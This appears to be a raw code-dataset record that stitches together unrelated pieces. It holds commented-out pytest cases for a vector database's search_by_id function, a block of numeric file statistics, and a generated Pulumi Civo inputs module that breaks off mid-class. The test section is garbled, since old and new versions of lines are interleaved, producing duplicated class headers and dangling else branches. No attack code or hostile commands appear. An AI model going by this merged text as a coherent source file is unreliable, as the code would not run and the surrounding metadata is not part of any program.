# status, result = connect.search_by_id(collection, top_k, query_id, partition_tags=[tag, new_tag], search_param)
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id, partition_tag_array=[tag, new_tag])
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
# assert check_result(result[0], new_ids[0])
# assert result[0][0].distance <= epsilon
# @pytest.mark.level(2)
# def test_search_by_id_without_connect(self, dis_connect, collection):
# '''
# target: test search vectors without connection
# method: use dis connected instance, call search method and check if search successfully
# expected: raise exception
# '''
# query_idtors = 123
# with pytest.raises(Exception) as e:
# status, ids = dis_connect.search_by_id(collection, top_k, query_idtors, params={})
# status, ids = dis_connect.search_by_id(collection, top_k, nprobe, query_idtors)
#
# def test_search_collection_name_not_existed(self, connect, collection):
# '''
# target: search collection not existed
# method: search with the random collection_name, which is not in db
# expected: status not ok
# '''
# collection_name = gen_unique_str("not_existed_collection")
# query_id = non_exist_id
# status, result = connect.search_by_id(collection_name, top_k, query_id, params={})
# assert not status.OK()
# status, result = connect.search_by_id(collection_name, top_k, nprobe, query_id)
# assert not status.OK()
# def test_search_collection_name_None(self, connect, collection):
# '''
# target: search collection that collection name is None
# method: search with the collection_name: None
# expected: status not ok
# '''
# collection_name = None
# query_ids = non_exist_id
# with pytest.raises(Exception) as e:
# status, result = connect.search_by_id(collection_name, top_k, query_id, params={})
# def test_search_jac(self, connect, jac_collection, get_jaccard_index):
# index_param = get_jaccard_index["index_param"]
# index_type = get_jaccard_index["index_type"]
# vectors, ids = self.init_data_binary(connect, jac_collection)
# status = connect.create_index(jac_collection, index_type, index_param)
# assert status.OK()
# query_id = ids[0]
# search_param = get_search_param(index_type)
# status, result = connect.search_by_id(jac_collection, top_k, query_id, params=search_param)
# status, result = connect.search_by_id(collection_name, top_k, nprobe, query_id)
#
# def test_search_jac(self, connect, jac_collection, get_jaccard_index_params):
# index_params = get_jaccard_index_params
# vectors, ids = self.init_data_binary(connect, jac_collection)
# status = connect.create_index(jac_collection, index_params)
# assert status.OK()
# query_id = ids[0]
# status, result = connect.search_by_id(jac_collection, top_k, nprobe, query_id)
# logging.getLogger().info(status)
# logging.getLogger().info(result)
# assert status.OK()
# assert check_result(result[0], ids[0])
# assert result[0][0].distance <= epsilon
# def test_search_ham(self, connect, ham_collection, get_hamming_index):
# index_param = get_hamming_index["index_param"]
# index_param = get_hamming_index["index_type"]
# vectors, ids = self.init_data_binary(connect, ham_collection)
# status = connect.create_index(ham_collection, index_type, index_param)
# assert status.OK()
# query_id = ids[0]
# search_param = get_search_param(index_type)
# status, result = connect.search_by_id(ham_collection, top_k, query_id, params=search_param)
#
# def test_search_ham(self, connect, ham_collection, get_hamming_index_params):
# index_params = get_hamming_index_params
# vectors, ids = self.init_data_binary(connect, ham_collection)
# status = connect.create_index(ham_collection, index_params)
# assert status.OK()
# query_id = ids[0]
# status, result = connect.search_by_id(ham_collection, top_k, nprobe, query_id)
# logging.getLogger().info(status)
# logging.getLogger().info(result)
# assert status.OK()
# assert check_result(result[0], ids[0])
# assert result[0][0].distance <= epsilon
# """
# ******************************************************************
# # The following cases are used to test `search_by_id` function
# # with invalid collection_name top-k / nprobe / query_range
# ******************************************************************
# """
# class TestSearchParamsInvalid(object):
# nlist = 16384
# index_type = IndexType.IVF_SQ8
# index_param = {"nlist": nlist}
#
# class TestSearchParamsInvalid(object):
# nlist = 16384
# index_param = {"index_type": IndexType.IVF_SQ8, "nlist": nlist}
#
# """
# Test search collection with invalid collection names
# """
# @pytest.fixture(
# scope="function",
# params=gen_invalid_collection_names()
# )
# def get_collection_name(self, request):
# yield request.param
# @pytest.mark.level(2)
# def test_search_with_invalid_collectionname(self, connect, get_collection_name):
# collection_name = get_collection_name
# query_id = non_exist_id
# status, result = connect.search_by_id(collection_name, top_k, query_id)
# assert not status.OK()
# status, result = connect.search_by_id(collection_name, top_k, nprobe, query_id)
# assert not status.OK()
#
# @pytest.mark.level(1)
# def test_search_with_invalid_tag_format(self, connect, collection):
# query_id = non_exist_id
# with pytest.raises(Exception) as e:
# status, result = connect.search_by_id(collection_name, top_k, query_id, partition_tags="tag")
# status, result = connect.search_by_id(collection_name, top_k, nprobe, query_id, partition_tag_array="tag")
#
# """
# Test search collection with invalid top-k
# """
# @pytest.fixture(
# scope="function",
# params=gen_invalid_top_ks()
# )
# def get_top_k(self, request):
# yield request.param
# @pytest.mark.level(1)
# def test_search_with_invalid_top_k(self, connect, collection, get_top_k):
# top_k = get_top_k
# query_id = non_exist_id
# if isinstance(top_k, int):
# status, result = connect.search_by_id(collection, top_k, query_id)
# assert not status.OK()
# else:
# with pytest.raises(Exception) as e:
# status, result = connect.search_by_id(collection, top_k, query_id)
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert not status.OK()
# else:
# with pytest.raises(Exception) as e:
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
#
# @pytest.mark.level(2)
# def test_search_with_invalid_top_k_ip(self, connect, ip_collection, get_top_k):
# top_k = get_top_k
# query_id = non_exist_id
# if isinstance(top_k, int):
# status, result = connect.search_by_id(ip_collection, top_k, query_id)
# assert not status.OK()
# else:
# with pytest.raises(Exception) as e:
# status, result = connect.search_by_id(ip_collection, top_k, query_id)
# status, result = connect.search_by_id(ip_collection, top_k, nprobe, query_id)
# assert not status.OK()
# else:
# with pytest.raises(Exception) as e:
# status, result = connect.search_by_id(ip_collection, top_k, nprobe, query_id)
#
# """
# Test search collection with invalid nprobe
# """
# @pytest.fixture(
# scope="function",
# params=gen_invalid_nprobes()
# )
# def get_nprobes(self, request):
# yield request.param
# @pytest.mark.level(1)
# def test_search_with_invalid_nprobe(self, connect, collection, get_nprobes):
# nprobe = get_nprobes
# logging.getLogger().info(nprobe)
# query_id = non_exist_id
# if isinstance(nprobe, int):
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert not status.OK()
# else:
# with pytest.raises(Exception) as e:
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# @pytest.mark.level(2)
# def test_search_with_invalid_nprobe_ip(self, connect, ip_collection, get_nprobes):
# '''
# target: test search function, with the wrong nprobe
# method: search with an invalid nprobe
# expected: raise an error, and the connection is normal
# '''
# nprobe = get_nprobes
# logging.getLogger().info(nprobe)
# query_id = non_exist_id
# if isinstance(nprobe, int):
# status, result = connect.search_by_id(ip_collection, top_k, nprobe, query_id)
# assert not status.OK()
# else:
# with pytest.raises(Exception) as e:
# status, result = connect.search_by_id(ip_collection, top_k, nprobe, query_id)
# """
# Test search collection with invalid ids
# """
# @pytest.fixture(
# scope="function",
# params=gen_invalid_vector_ids()
# )
# def get_vector_ids(self, request):
# yield request.param
# @pytest.mark.level(1)
# def test_search_flat_with_invalid_vector_id(self, connect, collection, get_vector_ids):
# '''
# target: test search function, with the wrong query_range
# method: search with query_range
# expected: raise an error, and the connection is normal
# '''
# query_id = get_vector_ids
# logging.getLogger().info(query_id)
# with pytest.raises(Exception) as e:
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# @pytest.mark.level(2)
# def test_search_flat_with_invalid_vector_id_ip(self, connect, ip_collection, get_vector_ids):
# query_id = get_vector_ids
# logging.getLogger().info(query_id)
# with pytest.raises(Exception) as e:
# status, result = connect.search_by_id(ip_collection, top_k, nprobe, query_id)
# def check_result(result, id):
# if len(result) >= 5:
# return id in [x.id for x in result[:5]]
# else:
# return id in (i.id for i in result)
| 47.001095
| 170
| 0.643759
| 5,386
| 42,912
| 4.842369
| 0.039361
| 0.032476
| 0.026073
| 0.04302
| 0.923009
| 0.90311
| 0.877459
| 0.860588
| 0.847245
| 0.826502
| 0
| 0.007875
| 0.242473
| 42,912
| 912
| 171
| 47.052632
| 0.794444
| 0.957401
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ecff11867b45d843837a87ea937c5cb00a3952f9
| 30,134
|
py
|
Python
|
sdk/python/pulumi_civo/_inputs.py
|
dirien/pulumi-civo
|
f75eb1482bade0d21fb25c9e20e6838791518226
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2020-08-04T12:27:02.000Z
|
2022-03-14T13:16:43.000Z
|
sdk/python/pulumi_civo/_inputs.py
|
dirien/pulumi-civo
|
f75eb1482bade0d21fb25c9e20e6838791518226
|
[
"ECL-2.0",
"Apache-2.0"
] | 85
|
2020-08-17T19:03:57.000Z
|
2022-03-25T19:17:57.000Z
|
sdk/python/pulumi_civo/_inputs.py
|
dirien/pulumi-civo
|
f75eb1482bade0d21fb25c9e20e6838791518226
|
[
"ECL-2.0",
"Apache-2.0"
] | 5
|
2020-08-04T12:27:03.000Z
|
2022-03-24T00:56:24.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
# Public input/argument types exported by this module (consumed via
# `from ._inputs import *` by the generated resource modules).
__all__ = [
    'KubernetesClusterInstalledApplicationArgs',
    'KubernetesClusterInstanceArgs',
    'KubernetesClusterPoolArgs',
    'KubernetesClusterPoolInstanceArgs',
    'LoadBalancerBackendArgs',
    'GetInstancesFilterArgs',
    'GetInstancesSizeFilterArgs',
    'GetInstancesSizeSortArgs',
    'GetInstancesSortArgs',
    'GetKubernetesVersionFilterArgs',
    'GetKubernetesVersionSortArgs',
    'GetRegionFilterArgs',
    'GetRegionSortArgs',
    'GetTemplateFilterArgs',
    'GetTemplateSortArgs',
]
@pulumi.input_type
class KubernetesClusterInstalledApplicationArgs:
    def __init__(__self__, *,
                 application: Optional[pulumi.Input[str]] = None,
                 category: Optional[pulumi.Input[str]] = None,
                 installed: Optional[pulumi.Input[bool]] = None,
                 version: Optional[pulumi.Input[str]] = None):
        """
        An application installed on a Kubernetes cluster.

        :param pulumi.Input[str] application: The name of the application
        :param pulumi.Input[str] category: The category of the application
        :param pulumi.Input[bool] installed: if installed or not
        :param pulumi.Input[str] version: The version of the application
        """
        # Only record the arguments that were explicitly supplied.
        for prop, arg in (("application", application),
                          ("category", category),
                          ("installed", installed),
                          ("version", version)):
            if arg is not None:
                pulumi.set(__self__, prop, arg)
    @property
    @pulumi.getter
    def application(self) -> Optional[pulumi.Input[str]]:
        """The name of the application"""
        return pulumi.get(self, "application")
    @application.setter
    def application(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "application", value)
    @property
    @pulumi.getter
    def category(self) -> Optional[pulumi.Input[str]]:
        """The category of the application"""
        return pulumi.get(self, "category")
    @category.setter
    def category(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "category", value)
    @property
    @pulumi.getter
    def installed(self) -> Optional[pulumi.Input[bool]]:
        """if installed or not"""
        return pulumi.get(self, "installed")
    @installed.setter
    def installed(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "installed", value)
    @property
    @pulumi.getter
    def version(self) -> Optional[pulumi.Input[str]]:
        """The version of the application"""
        return pulumi.get(self, "version")
    @version.setter
    def version(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "version", value)
@pulumi.input_type
class KubernetesClusterInstanceArgs:
    def __init__(__self__, *,
                 cpu_cores: Optional[pulumi.Input[int]] = None,
                 disk_gb: Optional[pulumi.Input[int]] = None,
                 hostname: Optional[pulumi.Input[str]] = None,
                 ram_mb: Optional[pulumi.Input[int]] = None,
                 size: Optional[pulumi.Input[str]] = None,
                 status: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
        """
        :param pulumi.Input[int] cpu_cores: Total cpu of the instance.
        :param pulumi.Input[int] disk_gb: The size of the disk.
        :param pulumi.Input[str] hostname: The hostname of the instance.
        :param pulumi.Input[int] ram_mb: Total ram of the instance
        :param pulumi.Input[str] size: The size of the instance.
        :param pulumi.Input[str] status: The status of Kubernetes cluster.
               * `ready` -If the Kubernetes cluster is ready.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A space separated list of tags, to be used freely as required.
        """
        if cpu_cores is not None:
            pulumi.set(__self__, "cpu_cores", cpu_cores)
        if disk_gb is not None:
            pulumi.set(__self__, "disk_gb", disk_gb)
        if hostname is not None:
            pulumi.set(__self__, "hostname", hostname)
        if ram_mb is not None:
            pulumi.set(__self__, "ram_mb", ram_mb)
        if size is not None:
            pulumi.set(__self__, "size", size)
        if status is not None:
            pulumi.set(__self__, "status", status)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
    @property
    @pulumi.getter(name="cpuCores")
    def cpu_cores(self) -> Optional[pulumi.Input[int]]:
        """
        Total cpu of the instance.
        """
        return pulumi.get(self, "cpu_cores")
    @cpu_cores.setter
    def cpu_cores(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "cpu_cores", value)
    @property
    @pulumi.getter(name="diskGb")
    def disk_gb(self) -> Optional[pulumi.Input[int]]:
        """
        The size of the disk.
        """
        return pulumi.get(self, "disk_gb")
    @disk_gb.setter
    def disk_gb(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "disk_gb", value)
    @property
    @pulumi.getter
    def hostname(self) -> Optional[pulumi.Input[str]]:
        """
        The hostname of the instance.
        """
        return pulumi.get(self, "hostname")
    @hostname.setter
    def hostname(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "hostname", value)
    @property
    @pulumi.getter(name="ramMb")
    def ram_mb(self) -> Optional[pulumi.Input[int]]:
        """
        Total ram of the instance
        """
        return pulumi.get(self, "ram_mb")
    @ram_mb.setter
    def ram_mb(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "ram_mb", value)
    @property
    @pulumi.getter
    def size(self) -> Optional[pulumi.Input[str]]:
        """
        The size of the instance.
        """
        return pulumi.get(self, "size")
    @size.setter
    def size(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "size", value)
    @property
    @pulumi.getter
    def status(self) -> Optional[pulumi.Input[str]]:
        """
        The status of Kubernetes cluster.
        * `ready` -If the Kubernetes cluster is ready.
        """
        return pulumi.get(self, "status")
    @status.setter
    def status(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "status", value)
    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        A space separated list of tags, to be used freely as required.
        """
        return pulumi.get(self, "tags")
    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)
@pulumi.input_type
class KubernetesClusterPoolArgs:
    def __init__(__self__, *,
                 count: Optional[pulumi.Input[int]] = None,
                 id: Optional[pulumi.Input[str]] = None,
                 instance_names: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 instances: Optional[pulumi.Input[Sequence[pulumi.Input['KubernetesClusterPoolInstanceArgs']]]] = None,
                 size: Optional[pulumi.Input[str]] = None):
        """
        A node pool of a Kubernetes cluster.

        :param pulumi.Input[int] count: The size of the pool
        :param pulumi.Input[str] id: The ID of the pool
        :param pulumi.Input[Sequence[pulumi.Input[str]]] instance_names: A list of the instance in the pool
        :param pulumi.Input[Sequence[pulumi.Input['KubernetesClusterPoolInstanceArgs']]] instances: A list of instance inside the pool
        :param pulumi.Input[str] size: The size of the instance.
        """
        # Only record the arguments that were explicitly supplied.
        for prop, arg in (("count", count),
                          ("id", id),
                          ("instance_names", instance_names),
                          ("instances", instances),
                          ("size", size)):
            if arg is not None:
                pulumi.set(__self__, prop, arg)
    @property
    @pulumi.getter
    def count(self) -> Optional[pulumi.Input[int]]:
        """The size of the pool"""
        return pulumi.get(self, "count")
    @count.setter
    def count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "count", value)
    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        """The ID of the pool"""
        return pulumi.get(self, "id")
    @id.setter
    def id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", value)
    @property
    @pulumi.getter(name="instanceNames")
    def instance_names(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """A list of the instance in the pool"""
        return pulumi.get(self, "instance_names")
    @instance_names.setter
    def instance_names(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "instance_names", value)
    @property
    @pulumi.getter
    def instances(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['KubernetesClusterPoolInstanceArgs']]]]:
        """A list of instance inside the pool"""
        return pulumi.get(self, "instances")
    @instances.setter
    def instances(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['KubernetesClusterPoolInstanceArgs']]]]):
        pulumi.set(self, "instances", value)
    @property
    @pulumi.getter
    def size(self) -> Optional[pulumi.Input[str]]:
        """The size of the instance."""
        return pulumi.get(self, "size")
    @size.setter
    def size(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "size", value)
@pulumi.input_type
class KubernetesClusterPoolInstanceArgs:
    def __init__(__self__, *,
                 cpu_cores: Optional[pulumi.Input[int]] = None,
                 disk_gb: Optional[pulumi.Input[int]] = None,
                 hostname: Optional[pulumi.Input[str]] = None,
                 ram_mb: Optional[pulumi.Input[int]] = None,
                 size: Optional[pulumi.Input[str]] = None,
                 status: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
        """
        :param pulumi.Input[int] cpu_cores: Total cpu of the instance.
        :param pulumi.Input[int] disk_gb: The size of the disk.
        :param pulumi.Input[str] hostname: The hostname of the instance.
        :param pulumi.Input[int] ram_mb: Total ram of the instance
        :param pulumi.Input[str] size: The size of the instance.
        :param pulumi.Input[str] status: The status of Kubernetes cluster.
               * `ready` -If the Kubernetes cluster is ready.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A space separated list of tags, to be used freely as required.
        """
        if cpu_cores is not None:
            pulumi.set(__self__, "cpu_cores", cpu_cores)
        if disk_gb is not None:
            pulumi.set(__self__, "disk_gb", disk_gb)
        if hostname is not None:
            pulumi.set(__self__, "hostname", hostname)
        if ram_mb is not None:
            pulumi.set(__self__, "ram_mb", ram_mb)
        if size is not None:
            pulumi.set(__self__, "size", size)
        if status is not None:
            pulumi.set(__self__, "status", status)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
    @property
    @pulumi.getter(name="cpuCores")
    def cpu_cores(self) -> Optional[pulumi.Input[int]]:
        """
        Total cpu of the instance.
        """
        return pulumi.get(self, "cpu_cores")
    @cpu_cores.setter
    def cpu_cores(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "cpu_cores", value)
    @property
    @pulumi.getter(name="diskGb")
    def disk_gb(self) -> Optional[pulumi.Input[int]]:
        """
        The size of the disk.
        """
        return pulumi.get(self, "disk_gb")
    @disk_gb.setter
    def disk_gb(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "disk_gb", value)
    @property
    @pulumi.getter
    def hostname(self) -> Optional[pulumi.Input[str]]:
        """
        The hostname of the instance.
        """
        return pulumi.get(self, "hostname")
    @hostname.setter
    def hostname(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "hostname", value)
    @property
    @pulumi.getter(name="ramMb")
    def ram_mb(self) -> Optional[pulumi.Input[int]]:
        """
        Total ram of the instance
        """
        return pulumi.get(self, "ram_mb")
    @ram_mb.setter
    def ram_mb(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "ram_mb", value)
    @property
    @pulumi.getter
    def size(self) -> Optional[pulumi.Input[str]]:
        """
        The size of the instance.
        """
        return pulumi.get(self, "size")
    @size.setter
    def size(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "size", value)
    @property
    @pulumi.getter
    def status(self) -> Optional[pulumi.Input[str]]:
        """
        The status of Kubernetes cluster.
        * `ready` -If the Kubernetes cluster is ready.
        """
        return pulumi.get(self, "status")
    @status.setter
    def status(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "status", value)
    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        A space separated list of tags, to be used freely as required.
        """
        return pulumi.get(self, "tags")
    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)
@pulumi.input_type
class LoadBalancerBackendArgs:
    def __init__(__self__, *,
                 instance_id: pulumi.Input[str],
                 port: pulumi.Input[int],
                 protocol: pulumi.Input[str]):
        """
        A backend attached to a load balancer. All three fields are required.

        :param pulumi.Input[str] instance_id: Identifier of the backend instance
            (presumably a Civo instance ID — confirm against the provider docs).
        :param pulumi.Input[int] port: Port number the backend is reached on.
        :param pulumi.Input[str] protocol: Protocol used for the backend
            (allowed values not visible here — confirm against the Civo API).
        """
        pulumi.set(__self__, "instance_id", instance_id)
        pulumi.set(__self__, "port", port)
        pulumi.set(__self__, "protocol", protocol)
    @property
    @pulumi.getter(name="instanceId")
    def instance_id(self) -> pulumi.Input[str]:
        # Identifier of the backend instance.
        return pulumi.get(self, "instance_id")
    @instance_id.setter
    def instance_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "instance_id", value)
    @property
    @pulumi.getter
    def port(self) -> pulumi.Input[int]:
        # Port number the backend is reached on.
        return pulumi.get(self, "port")
    @port.setter
    def port(self, value: pulumi.Input[int]):
        pulumi.set(self, "port", value)
    @property
    @pulumi.getter
    def protocol(self) -> pulumi.Input[str]:
        # Protocol used for the backend.
        return pulumi.get(self, "protocol")
    @protocol.setter
    def protocol(self, value: pulumi.Input[str]):
        pulumi.set(self, "protocol", value)
@pulumi.input_type
class GetInstancesFilterArgs:
    def __init__(__self__, *,
                 key: str,
                 values: Sequence[str],
                 all: Optional[bool] = None,
                 match_by: Optional[str] = None):
        """
        :param str key: Filter the Instances by this key. This may be one of `id`, `hostname`, `public_ip`, `private_ip`,
               `pseudo_ip`, `size`, `cpu_cores`, `ram_mb`, `disk_gb`, `template` or `created_at`.
        :param Sequence[str] values: A list of values to match against the `key` field. Only retrieves Instances
               where the `key` field takes on one or more of the values provided here.
        """
        pulumi.set(__self__, "key", key)
        pulumi.set(__self__, "values", values)
        # Optional matching modifiers are only stored when supplied.
        for prop, arg in (("all", all), ("match_by", match_by)):
            if arg is not None:
                pulumi.set(__self__, prop, arg)
    @property
    @pulumi.getter
    def key(self) -> str:
        """
        Filter the Instances by this key. This may be one of `id`, `hostname`, `public_ip`, `private_ip`,
        `pseudo_ip`, `size`, `cpu_cores`, `ram_mb`, `disk_gb`, `template` or `created_at`.
        """
        return pulumi.get(self, "key")
    @key.setter
    def key(self, value: str):
        pulumi.set(self, "key", value)
    @property
    @pulumi.getter
    def values(self) -> Sequence[str]:
        """
        A list of values to match against the `key` field. Only retrieves Instances
        where the `key` field takes on one or more of the values provided here.
        """
        return pulumi.get(self, "values")
    @values.setter
    def values(self, value: Sequence[str]):
        pulumi.set(self, "values", value)
    @property
    @pulumi.getter
    def all(self) -> Optional[bool]:
        return pulumi.get(self, "all")
    @all.setter
    def all(self, value: Optional[bool]):
        pulumi.set(self, "all", value)
    @property
    @pulumi.getter(name="matchBy")
    def match_by(self) -> Optional[str]:
        return pulumi.get(self, "match_by")
    @match_by.setter
    def match_by(self, value: Optional[str]):
        pulumi.set(self, "match_by", value)
@pulumi.input_type
class GetInstancesSizeFilterArgs:
    def __init__(__self__, *,
                 key: str,
                 values: Sequence[str],
                 all: Optional[bool] = None,
                 match_by: Optional[str] = None):
        """
        Filter specification for the instances-size data source.

        Same shape as the other filter args in this module: a required `key`
        and `values`, plus optional `all` / `match_by` matching modifiers.
        Accepted keys are not visible here — confirm against the Civo
        provider documentation.
        """
        pulumi.set(__self__, "key", key)
        pulumi.set(__self__, "values", values)
        if all is not None:
            pulumi.set(__self__, "all", all)
        if match_by is not None:
            pulumi.set(__self__, "match_by", match_by)
    @property
    @pulumi.getter
    def key(self) -> str:
        # Field to filter by.
        return pulumi.get(self, "key")
    @key.setter
    def key(self, value: str):
        pulumi.set(self, "key", value)
    @property
    @pulumi.getter
    def values(self) -> Sequence[str]:
        # Values matched against the `key` field.
        return pulumi.get(self, "values")
    @values.setter
    def values(self, value: Sequence[str]):
        pulumi.set(self, "values", value)
    @property
    @pulumi.getter
    def all(self) -> Optional[bool]:
        # Optional matching modifier; semantics defined by the provider.
        return pulumi.get(self, "all")
    @all.setter
    def all(self, value: Optional[bool]):
        pulumi.set(self, "all", value)
    @property
    @pulumi.getter(name="matchBy")
    def match_by(self) -> Optional[str]:
        # Optional matching strategy; semantics defined by the provider.
        return pulumi.get(self, "match_by")
    @match_by.setter
    def match_by(self, value: Optional[str]):
        pulumi.set(self, "match_by", value)
@pulumi.input_type
class GetInstancesSizeSortArgs:
    def __init__(__self__, *,
                 key: str,
                 direction: Optional[str] = None):
        """
        Sort specification for the instances-size data source.

        :param str key: Field to sort by (accepted keys not visible here —
            confirm against the Civo provider documentation).
        :param str direction: Sort direction; the sibling *Sort args document
            `asc` / `desc` — presumably the same here, TODO confirm.
        """
        pulumi.set(__self__, "key", key)
        if direction is not None:
            pulumi.set(__self__, "direction", direction)
    @property
    @pulumi.getter
    def key(self) -> str:
        # Field to sort by.
        return pulumi.get(self, "key")
    @key.setter
    def key(self, value: str):
        pulumi.set(self, "key", value)
    @property
    @pulumi.getter
    def direction(self) -> Optional[str]:
        # Sort direction (presumably `asc`/`desc` — see __init__ docstring).
        return pulumi.get(self, "direction")
    @direction.setter
    def direction(self, value: Optional[str]):
        pulumi.set(self, "direction", value)
@pulumi.input_type
class GetInstancesSortArgs:
    def __init__(__self__, *,
                 key: str,
                 direction: Optional[str] = None):
        """
        :param str key: Sort the Instance by this key. This may be one of `id`, `hostname`, `public_ip`, `private_ip`,
               `pseudo_ip`, `size`, `cpu_cores`, `ram_mb`, `disk_gb`, `template` or `created_at`.
        :param str direction: The sort direction. This may be either `asc` or `desc`.
        """
        pulumi.set(__self__, "key", key)
        # Direction is optional; skip storing it when absent.
        if direction is None:
            return
        pulumi.set(__self__, "direction", direction)
    @property
    @pulumi.getter
    def key(self) -> str:
        """
        Sort the Instance by this key. This may be one of `id`, `hostname`, `public_ip`, `private_ip`,
        `pseudo_ip`, `size`, `cpu_cores`, `ram_mb`, `disk_gb`, `template` or `created_at`.
        """
        return pulumi.get(self, "key")
    @key.setter
    def key(self, value: str):
        pulumi.set(self, "key", value)
    @property
    @pulumi.getter
    def direction(self) -> Optional[str]:
        """The sort direction. This may be either `asc` or `desc`."""
        return pulumi.get(self, "direction")
    @direction.setter
    def direction(self, value: Optional[str]):
        pulumi.set(self, "direction", value)
@pulumi.input_type
class GetKubernetesVersionFilterArgs:
    def __init__(__self__, *,
                 key: str,
                 values: Sequence[str],
                 all: Optional[bool] = None,
                 match_by: Optional[str] = None):
        """
        :param str key: Filter the sizes by this key. This may be one of `version`,
               `label`, `type`, `default`.
        :param Sequence[str] values: Only retrieves the version which keys has value that matches
               one of the values provided here.
        """
        pulumi.set(__self__, "key", key)
        pulumi.set(__self__, "values", values)
        # Optional matching modifiers are only stored when supplied.
        for prop, arg in (("all", all), ("match_by", match_by)):
            if arg is not None:
                pulumi.set(__self__, prop, arg)
    @property
    @pulumi.getter
    def key(self) -> str:
        """
        Filter the sizes by this key. This may be one of `version`,
        `label`, `type`, `default`.
        """
        return pulumi.get(self, "key")
    @key.setter
    def key(self, value: str):
        pulumi.set(self, "key", value)
    @property
    @pulumi.getter
    def values(self) -> Sequence[str]:
        """
        Only retrieves the version which keys has value that matches
        one of the values provided here.
        """
        return pulumi.get(self, "values")
    @values.setter
    def values(self, value: Sequence[str]):
        pulumi.set(self, "values", value)
    @property
    @pulumi.getter
    def all(self) -> Optional[bool]:
        return pulumi.get(self, "all")
    @all.setter
    def all(self, value: Optional[bool]):
        pulumi.set(self, "all", value)
    @property
    @pulumi.getter(name="matchBy")
    def match_by(self) -> Optional[str]:
        return pulumi.get(self, "match_by")
    @match_by.setter
    def match_by(self, value: Optional[str]):
        pulumi.set(self, "match_by", value)
@pulumi.input_type
class GetKubernetesVersionSortArgs:
    def __init__(__self__, *,
                 key: str,
                 direction: Optional[str] = None):
        """
        :param str key: Sort the sizes by this key. This may be one of `version`.
        :param str direction: The sort direction. This may be either `asc` or `desc`.
        """
        pulumi.set(__self__, "key", key)
        # Direction is optional; skip storing it when absent.
        if direction is None:
            return
        pulumi.set(__self__, "direction", direction)
    @property
    @pulumi.getter
    def key(self) -> str:
        """Sort the sizes by this key. This may be one of `version`."""
        return pulumi.get(self, "key")
    @key.setter
    def key(self, value: str):
        pulumi.set(self, "key", value)
    @property
    @pulumi.getter
    def direction(self) -> Optional[str]:
        """The sort direction. This may be either `asc` or `desc`."""
        return pulumi.get(self, "direction")
    @direction.setter
    def direction(self, value: Optional[str]):
        pulumi.set(self, "direction", value)
@pulumi.input_type
class GetRegionFilterArgs:
    def __init__(__self__, *,
                 key: str,
                 values: Sequence[str],
                 all: Optional[bool] = None,
                 match_by: Optional[str] = None):
        """
        :param str key: Filter the sizes by this key. This may be one of `code`, `name`, `country`, `default`.
        :param Sequence[str] values: Only retrieves region which keys has value that matches one of the values provided here.
        """
        pulumi.set(__self__, "key", key)
        pulumi.set(__self__, "values", values)
        # Optional matching modifiers are only stored when supplied.
        for prop, arg in (("all", all), ("match_by", match_by)):
            if arg is not None:
                pulumi.set(__self__, prop, arg)
